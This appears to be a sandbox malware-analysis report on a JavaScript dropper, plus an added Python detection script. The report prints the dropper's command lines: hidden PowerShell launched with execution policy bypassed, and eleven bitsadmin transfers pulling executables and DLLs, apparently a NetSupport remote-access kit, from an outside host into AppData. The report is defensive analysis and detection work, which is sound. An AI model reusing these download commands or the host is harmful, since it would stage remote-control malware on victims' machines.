Analysis
max time kernel: 98s
max time network: 105s
platform: windows7_x64
resource: win7-20230705-en
resource tags: arch:x64 arch:x86 image:win7-20230705-en locale:en-us os:windows7-x64 system
submitted: 09/07/2023, 19:19
Static task: static1
Behavioral task: behavioral1
  Sample: ave6608jsjsjsjsjsjsjsjsjs.js
  Resource: win7-20230705-en
Behavioral task: behavioral2
  Sample: ave6608jsjsjsjsjsjsjsjsjs.js
  Resource: win10v2004-20230703-en
General
Target: ave6608jsjsjsjsjsjsjsjsjs.js
Size: 48KB
MD5: 493f69ec7712ffa62e867ad4d1782032
SHA1: d1793f4c3c1a4edeb6f733357ca8905e6fa384c9
SHA256: 2b04eb3c0f95ecd1e2a5b74275d82ce3d92f8b153774a59fb7243d39b1b56ae9
SHA512: 1bddaa72265811bfda643596cb6bc211a07f9687d9f5cc21a10c9cff362da4d8f013328a5e484557f7559fa60434f39087d611dfcf54fe7e8abf4fd2cd836a09
SSDEEP: 768:mj+yH/l9fdyDlNT4kBPZT3ezR++ag4yuCdIfqMrWVE0rZj4P/T:myyH/ndyDlNT4mPlu+BOuKIfqYgZjyT
Malware Config
Extracted URLs:
  https://virvatulishop.com/labda.zip
  https://virvatulishop.com/files/
Signatures

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Download via BitsAdmin (1 TTP, 11 IoCs)
  pid   process
  2444  bitsadmin.exe
  3052  bitsadmin.exe
  2168  bitsadmin.exe
  2772  bitsadmin.exe
  2944  bitsadmin.exe
  1092  bitsadmin.exe
  2696  bitsadmin.exe
  2200  bitsadmin.exe
  2188  bitsadmin.exe
  1380  bitsadmin.exe
  2292  bitsadmin.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   process
  3000  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description                  pid   process
  Token: SeDebugPrivilege      3000  powershell.exe

Suspicious use of WriteProcessMemory (36 IoCs)
  The report lists each parent-to-child write three times; the 36 entries reduce to the 12 parent/child pairs below, which mirror the process tree (wscript.exe spawning powershell.exe, powershell.exe spawning the eleven bitsadmin.exe jobs).
  description                  pid   process         procid_target
  PID 3060 wrote to memory of 3000  3060  wscript.exe      27
  PID 3000 wrote to memory of 3052  3000  powershell.exe   29
  PID 3000 wrote to memory of 2200  3000  powershell.exe   30
  PID 3000 wrote to memory of 2168  3000  powershell.exe   31
  PID 3000 wrote to memory of 2772  3000  powershell.exe   32
  PID 3000 wrote to memory of 2944  3000  powershell.exe   33
  PID 3000 wrote to memory of 2188  3000  powershell.exe   34
  PID 3000 wrote to memory of 1380  3000  powershell.exe   35
  PID 3000 wrote to memory of 2292  3000  powershell.exe   36
  PID 3000 wrote to memory of 1092  3000  powershell.exe   37
  PID 3000 wrote to memory of 2696  3000  powershell.exe   38
  PID 3000 wrote to memory of 2444  3000  powershell.exe   39
Processes

Level 1: C:\Windows\system32\wscript.exe (PID 3060)
  Command: wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js
  Signatures: Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3000)
    Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps1
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\system32\bitsadmin.exe (eleven children of PID 3000, each flagged "Download via BitsAdmin")
      Every child was launched with the same form of command line, differing only in the remote file and local destination:
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal <remote URL> <local destination>
      Local destination paths are reproduced exactly as the report prints them.

      PID   remote URL                                          local destination
      3052  https://virvatulishop.com/files/AudioCapture.dll    C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
      2200  https://virvatulishop.com/files/client32.exe        C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
      2168  https://virvatulishop.com/files/client32.ini        C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini
      2772  https://virvatulishop.com/files/HTCTL32.DLL         C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL
      2944  https://virvatulishop.com/files/msvcr100.dll        C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll
      2188  https://virvatulishop.com/files/nskbfltr.inf        C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf
      1380  https://virvatulishop.com/files/NSM.LIC             C:\Users\Admin\AppData\RoamingOfficeStartupNSM.LIC
      2292  https://virvatulishop.com/files/pcicapi.dll         C:\Users\Admin\AppData\RoamingOfficeStartuppcicapi.dll
      1092  https://virvatulishop.com/files/PCICHEK.DLL         C:\Users\Admin\AppData\RoamingOfficeStartupPCICHEK.DLL
      2696  https://virvatulishop.com/files/PCICL32.DLL         C:\Users\Admin\AppData\RoamingOfficeStartupPCICL32.DLL
      2444  https://virvatulishop.com/files/remcmdstub.exe      C:\Users\Admin\AppData\RoamingOfficeStartupremcmdstub.exe
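The process tree above is the whole story of this sample: a script host runs a hidden, policy-bypassing PowerShell script, which fans out eleven BITS jobs that pull a fixed file set from one host into a folder under AppData. The block below is an added example written for this page, not sandbox output or the dropper's own code. It rebuilds the tree from records constructed from the Processes section (the record layout pid/ppid/image/cmdline is an assumption, not a Triage export format), applies two detection rules (script host spawning `powershell.exe -ExecutionPolicy Bypass -WindowStyle hidden`, and `bitsadmin /transfer` fetching a remote URL into a user-writable path), and collects the IoCs a responder would pivot on: the download host, the BITS job name, and the dropped file names. The file-set check at the end is the editor's observation, not the report's: client32.exe, client32.ini, NSM.LIC, PCICHEK.DLL, PCICL32.DLL, HTCTL32.DLL, pcicapi.dll, remcmdstub.exe and nskbfltr.inf are the components of the NetSupport Manager remote-control client, which this report does not name.

```python
"""Detection over the process tree in this report (added example, not sandbox output)."""
import re
from collections import Counter
from urllib.parse import urlparse

# Records constructed from the report's Processes section: (pid, ppid, image, cmdline).
_REMOTE = "https://virvatulishop.com/files/"
_DEST = r"C:\Users\Admin\AppData\RoamingOfficeStartup"  # destination prefix exactly as the report prints it
_BITS = [  # (pid, file) for the eleven bitsadmin.exe children, in report order
    (3052, "AudioCapture.dll"), (2200, "client32.exe"), (2168, "client32.ini"),
    (2772, "HTCTL32.DLL"), (2944, "msvcr100.dll"), (2188, "nskbfltr.inf"),
    (1380, "NSM.LIC"), (2292, "pcicapi.dll"), (1092, "PCICHEK.DLL"),
    (2696, "PCICL32.DLL"), (2444, "remcmdstub.exe"),
]
EVENTS = [
    (3060, 0, r"C:\Windows\system32\wscript.exe",
     r"wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js"),
    (3000, 3060, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass '
     r"-WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps1"),
] + [
    (pid, 3000, r"C:\Windows\system32\bitsadmin.exe",
     rf'"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal {_REMOTE}{name} {_DEST}{name}')
    for pid, name in _BITS
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Editor's attribution, not the report's: this is the NetSupport Manager client file set.
NETSUPPORT_KIT = {"client32.exe", "client32.ini", "nsm.lic", "pcichek.dll", "pcicl32.dll",
                  "htctl32.dll", "pcicapi.dll", "remcmdstub.exe", "nskbfltr.inf"}
# bitsadmin /transfer <job> [flags] <remote URL> <local path>
BITS_RE = re.compile(r"/transfer\s+(?P<job>\S+).*?(?P<url>https?://\S+)\s+(?P<dest>\S+)", re.I)


def basename(path: str) -> str:
    """Last path component, lower-cased, for either separator style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Apply the two rules and gather IoCs; returns a plain dict for downstream use."""
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    out = {"powershell_from_script_host": [], "bits_downloads": [],
           "hosts": Counter(), "jobs": Counter(), "netsupport_kit": []}
    dropped = set()
    for pid, ppid, image, cmd in events:
        img = basename(image)
        parent_img = basename(by_pid[ppid][1]) if ppid in by_pid else ""
        low = cmd.lower()
        # Rule 1: script host -> hidden PowerShell with execution policy bypassed.
        if (img == "powershell.exe" and parent_img in SCRIPT_HOSTS
                and "-executionpolicy bypass" in low and "-windowstyle hidden" in low):
            out["powershell_from_script_host"].append(pid)
        # Rule 2: BITS transfer from a remote URL into a user-writable AppData path.
        if img == "bitsadmin.exe":
            m = BITS_RE.search(cmd)
            if m and "\\appdata\\" in m["dest"].lower():
                url = m["url"]
                host = urlparse(url).hostname
                out["bits_downloads"].append(
                    {"pid": pid, "job": m["job"], "url": url, "dest": m["dest"], "host": host})
                out["hosts"][host] += 1
                out["jobs"][m["job"]] += 1
                dropped.add(urlparse(url).path.rsplit("/", 1)[-1].lower())
    # Flag the dropped file set if it overlaps the known kit (3 or more names).
    kit = sorted(dropped & NETSUPPORT_KIT)
    if len(kit) >= 3:
        out["netsupport_kit"] = kit
    return out


if __name__ == "__main__":
    result = analyze(EVENTS)
    print("hidden PowerShell from script host:", result["powershell_from_script_host"])
    print("BITS downloads:", len(result["bits_downloads"]), "host(s):", dict(result["hosts"]),
          "job(s):", dict(result["jobs"]))
    print("kit files dropped:", result["netsupport_kit"])
```

On a real host the same two rules map directly onto process-creation telemetry (Sysmon Event ID 1 or Security 4688 with command-line logging), and the BITS side can be corroborated from the Microsoft-Windows-Bits-Client operational log, where each `/transfer` leaves a job with the same name (`MeDoW` here) and remote URL.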
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 1KB
MD5: d8d4beafe295f925cf1e7c73667b99cb
SHA1: dc73efce5921033d72bbb09713b347f0e5b6358f
SHA256: 82d78c24842eda98e42ff73b25fd97dd52ed9046c4c5e5200bb2ad760c18f9c3
SHA512: dfe68905caed73d5d61090598bab5db93e432098e37bf815243b7c031fd4403c3a1fbeab314edc22f466a22de521f8a2fa5bbf27356a958aafd56f2fa9feef21